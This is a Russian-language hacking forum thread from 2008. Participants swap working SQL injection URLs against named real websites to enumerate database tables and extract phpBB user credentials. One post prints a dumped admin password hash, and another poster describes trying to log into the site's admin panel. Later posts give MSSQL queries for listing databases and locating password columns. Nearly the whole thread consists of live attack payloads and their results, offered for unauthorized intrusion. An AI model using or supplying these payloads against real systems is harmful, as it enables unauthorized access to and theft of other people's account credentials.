
10.05.2008, 22:10
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
|
|
|

10.05.2008, 22:25
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Сообщение от diznt
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,concat(username,0x3a,user_passwor d,0x3a,user_icq),3,4,5,6,7,8,9+from+phpbb_users+li mit+1,1/*
юзеры форума. Если на сайте есть форум, значит можно попытать залезть а таблицу его юзеров. Для пхпбб эта таблица как правило имеет название phpbb_users.
А вобще используй запрос типа такого http://www.site.ru/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name='passwor d'/*
Ты получаешь все таблицы, где есть колумн password. Можно вместо ='password' использовать функцию char()
|
|
|

10.05.2008, 22:26
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
мде..
Сообщение от diznt
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
Напиши скрипт(например на пхп)который будит будит подставлять значения лимита за тебя и собирать результат в тхт (где-то видел такой,помоему на грабберз.ком )
ЗЫ:Первые 17 значений - системные таблы!
Последний раз редактировалось S00pY; 10.05.2008 в 22:28..
|
|
|

10.05.2008, 02:27
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
кароче я все подставил как мне человнк подсказал и получилось)) вот что получилось http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,usr_emai l,usr_psw,15,16,usr_id,18+from+users+limit+1,1/*
Собственно я сразу побежал в админку http://r-est.biz/admin вроде как не получилось войти (катогория админки не та вроде как) кароче я решил ломануть ихний phpbb форум. подставил все вроде правильно но чето не высвечиваеться пароли((
http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,username ,user_password,15,16,user_id,18+from+phpbb_users+l imit+1,1/*
вот колонки phpbb
http://r-est.biz/?r=nj&n=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12 ,13,14 ,15,16,column_name,18+from+information_schema.colu mns+where+table_name=0x70687062625f7573657273+limi t+1,100/*
Подскажите если не трудно
|
|
|

10.05.2008, 05:33
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
diznt
не трудно..)
http://r-est.biz/?r=nj&n=-http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,table_schema+from+Information_schema.tables +where+table_name=%200x70687062625f7573657273+limi t+0,1/*
http://r-est.biz/?r=nj&n=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,concat(user_id,0x3a,usern ame,0x3a,user_password),null,null,null,null,null+f rom+restbi_bb.phpbb_users/*
admin;e816c860394f9fb51eed8d902a569e5d
Последний раз редактировалось sabe; 10.05.2008 в 06:34..
|
|
|

10.05.2008, 12:02
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами:
9619229
Репутация:
445
|
|
точно там же concat)) блогадарю
|
|
|

10.05.2008, 22:50
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2 diznt ...ves' kaif lomae6.... uznavat' tables i columns v udovol'stvie.ili ti postavil na promishlennii ma6tab vzlomi 4erez sql.Kud anarod katitsea  )) nikakoi romantiki uje...vse na avtomatiku prutsea..skoro v detskom sadike deti budut progoi ustanovlenoi v tetris serveri lomat'  )) uda4i vam vsem v va6em nelegkom trude....
|
|
|

11.05.2008, 08:15
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
С нами:
10262314
Репутация:
668
|
|
знаю что нет но всётаки решил спрсить.... в mssql иньекции никак не выдернуить данные из другой бд?
|
|
|

11.05.2008, 09:09
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами:
10660753
Репутация:
676
|
|
xcedz
откуда в mssql - load_file() взялся?
в mssql иньекции никак не выдернуить данные из другой бд?
Что ты подразумеваешь под другой БД?
select ColumnName from DBname.TableName ???
имена бд на сервере можно так посматреть:
Select schema_name from information_schema.schemata
если ты конечно про это...
Последний раз редактировалось aka PSIH; 11.05.2008 в 09:15..
|
|
|

11.05.2008, 09:14
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от aka PSIH
xcedz
откуда в mssql - load_file() взялся?
 блин не внимательно посмотрел.
==
а можно так:
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
http://msdn.microsoft.com/en-us/library/bb545450.aspx
тогда для текущей базы:
----------------------------------------
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --
h==p://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
Последний раз редактировалось xcedz; 11.05.2008 в 09:37..
|
|
|
|
 |
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|